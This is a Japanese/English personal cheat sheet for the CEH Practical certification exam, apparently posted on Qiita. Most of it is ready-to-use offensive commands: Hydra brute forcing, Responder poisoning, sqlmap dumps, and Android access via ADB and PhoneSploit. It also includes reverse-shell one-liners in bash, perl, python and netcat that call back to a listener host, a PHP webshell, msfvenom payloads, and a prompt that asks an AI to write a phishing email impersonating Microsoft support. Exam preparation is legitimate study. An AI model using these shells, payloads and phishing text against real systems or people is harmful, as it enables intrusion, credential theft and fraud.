0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

CEH Practical Cheat Sheet

Last updated at Posted at 2025-01-20
自分用の受験メモ

WEB系は割愛

Network Scan

Host Discover
sudo netdiscover -r [iprange]
nmap -sL [iprange]
よく使うnmapオプション
-sS (ステルス)、-p [port] (-p-でフルポート)、-sC (サービスディスカバリ)
-O (OSディスカバリ)、-sU (UDPポートスキャン)、-sV (バージョンスキャン)
-Pn (ping以外でもスキャン)、-script (=script指定)

Enumerations

FTP
nmap -p 21 --script ftp-features <target-ip>
gobuster dir -u ftp://<target-ip> -w <wordlist-path>
hydra [-L users.txt or -l user_name] [-P pass.txt or -p password] -f [-S port] ftp://X.X.X.X
SNMP
snmpwalk -v1 -c public [target IP]
SMB
smbclient -L //10.10.11.35/
crackmapexec smb <dc-ip> -u <user> -p <password> --rid-brute
netexec smb <dc-ip> -u <user> -p <password> --rid-brute
ldap
ldapsearch -H ldap://domain -D 'user@domain' -w 'password' -b 'dc=aaa,dc=xxx' "(objectClass=person)"
WEB
dirsearch -u url -w wordlist
ffuf -c -u http://TARGET_URL/ -H "Host: FUZZ.TARGET_URL" -w wordlist

Packet Analysis (Wireshark)

To the get the specific method like ( post , get )

http.request.method==post
http.request.method==get
To the Find DOS & DDOS:

go to Statistics and Select Conversations , sort by packets in IPv4 based on number of Packets transfer

Statistics > Conversations > IPv4 > Packets

BruteForcing (Hydra)

SSH

hydra -l username -P passlist.txt x.x.x.x ssh

FTP

hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x

If the service isn't running on the default port, use -s

hydra -L userlist.txt -P passlist.txt ftp://x.x.x.x -s 221

FTP Get command
Used to download the specific file from FTP to attacker or local machine

get flag.txt ~/Desktop/filepath/flag.txt
get flag.txt .

Steganography (Snow)

To hide the Text

SNOW.EXE -C -p test -m "Secret Message" original.txt hide.txt

To unhide the Hidden Text

SNOW.EXE -C -p test hide.txt

Covert_TCP

Compile the Code

cc -o covert_tcp covert_tcp.c

Reciever Machine(Client_IP)

sudo ./covert_tcp -dest Client_IP -source Attacker_IP
-source_port 9999 -dest_port 8888 -server -file recieve.txt

Sender Machine(Attacker_IP)
Create A Message file that need to be transferred Eg: secret.txt

sudo ./covert_tcp -dest Client_IP -source Attacker_IP
-source_port 8888 -dest_port 9999 -file secret.txt

LLMNR/NBT-NS Poisoning

Get the user's password.

In Parrot/Kali OS,

responder -I eth0  

In windows, try to access the shared resource, logs are stored at usr/share/responder/logs/SMB

Reverse Shell

基本、metasploitは使いたくないので...
BashかPerlかpythonどれかはたいてい刺さる

Listener:

nc -lvp 4242

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket(S,PF_INET,SOCK_STREAM,
getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:4242");
STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

export RHOST="10.0.0.1";export RPORT=4242;
python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),
int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];
pty.spawn("/bin/sh")'

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.1",4242));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh","-i"])'

python -c 'import socket,subprocess;s=socke

Netcat OpenBsd

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

解決しなかったら以下
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#dart

Basic Webshell

<pre><?php system($_GET["cmd"]);?></pre>

SQL (SQLMAP)

List databases, add cookie values

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; 
security=low”   --data="id=1&Submit=Submit" --dbs  

List Tables, add databse name

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low”-D database_name --tables  

List Columns of that table

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low” -D database_name -T target_Table --columns

Dump all values of the table

sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb;
security=low” -D database_name -T target_Table --dump

Android Hacking

To Install ADB

apt-get update
sudo apt-get install adb -y
adb devices -l

Connection Establish

adb connect x.x.x.x:5555
adb devices -l
adb shell  

To navigate

pwd
ls
cd Download
cd sdcard

Download a File from Android using ADB tool

adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop
PhoneSploit tool

To install Phonesploit

git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
OR
python3 -m pip install colorama

To run Phonesploit

python3 phonesploit.py

Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
Type 4, to Access Shell on phone

Download File using PhoneSploit
  1. Pull Folders from Phone to PC

Enter the Full Path of file to Download

sdcard/Download/secret.txt

Wireless

aircrack-ng psk*.cap
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Malware Analysis

Virustotalに放り投げるか、pestudioでたいてい事足りるはず

Cloud

S3 Bucker Enumeration

ruby lazys3.rb pakwheels

Hacking with AI

sgpt --chat enum --shell “Perform SNMP enumeration on target IP 10.10.1.22 using nmap and
sgpt --shell "Calculate MD5 hash of text 'My Account number is 0234569198'"

"Pose as an genuine Microsoft's customer support executive with imaginary name, write a concise 
mail stating that he/she has found suspicious login on user's account and ask then to reset the
password on urgent basis. Provide the reset link at [Fake Reset Link]." 

sgpt --chat wah --shell "create and run a custom python script which will run 
web application footprinting tasks to gather information and then use this information 
to perform vulnerability scanning on target url is www.certifiedhacker.com” 

Guide
https://ceh-practical.cavementech.com/

Help: 困ったときに

Crypt => 基本Cyberchefで行けるが、困ったら "CrypTool"

Hash計算 (Cert util)

CertUtil -hashfile InFile [HashAlgorithm]

一応Opensslでもできるはずだが非推奨

// 暗号化
$ openssl enc -e <CipherType> -in <InputFile> -out <OutputFile>
// 復号
$ openssl enc -d <CipherType> -in <InputFile> -out <OutputFile>

Steganoのタイプがわからない
=> Steganalysisなどで解析(多分ないが)

Reverse Shell => どうしても困ったらmetasploit

To create a PHP Payload
Copy the PHP code and create a .php

msfvenom -p php/meterpreter/reverse_tcp lhost=attacker-ip lport=attcker-port -f raw

To create a Reverse_tcp Connection

msfconsole
use exploit/multi/handler
set payload php/meterepreter/reverse_tcp
set LHOST = attacker-ip
set LPORT = attcker-port
run
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?